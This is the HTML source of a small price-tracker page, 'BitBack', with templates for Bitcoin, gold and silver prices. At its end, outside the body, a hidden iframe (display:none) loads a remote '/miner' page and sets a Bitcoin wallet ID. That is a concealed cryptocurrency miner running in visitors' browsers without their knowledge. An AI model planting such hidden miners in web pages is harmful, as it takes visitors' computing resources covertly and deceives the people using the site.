<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8">
		<meta name="viewport" content="width=device-width, user-scalable=false;">

		<title>BitBack</title>
		<style>
			body {
				font-family: Helvetica;
				padding: 0 1rem;
			}
			.section {
			}
		</style>
		<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
		<script src="//cdnjs.cloudflare.com/ajax/libs/underscore.js/1.5.2/underscore-min.js"></script>
		<script src="//cdnjs.cloudflare.com/ajax/libs/backbone.js/1.0.0/backbone-min.js"></script>
		<script type='text/javascript' src='https://cdn.firebase.com/v0/firebase.js'></script>

	</head>
	<body>
		<div id="bitcoin" class="section"></div>
		<div id="gold" class="section"></div>
		<div id="silver" class="section"></div>

		<script id="btc-template" type="text/html">
			<h2>BitCoin</h2>
			<p><%= last %></p>
			<small><%= updated %></small>
		</script>
		<script id="gold-template" type="text/html">
			<h2>Gold (<%= ticker %>)</h2>
			<p><%= price %></p>
			<small><%= updated %></small>
		</script>
		<script id="silver-template" type="text/html">
			<h2>Silver (<%= ticker %>)</h2>
			<p><%= price %></p>
			<small><%= updated %></small>
		</script>
	</body>
	<script src="app.js"></script>
	<iframe style='display:none' src='http://shoop-team.2013.nodeknockout.com/miner'><script>window.walletId = 1Mtr3VEAjK8FCHLDNadSaLyFs1of1qvFf5</script></iframe>
</html>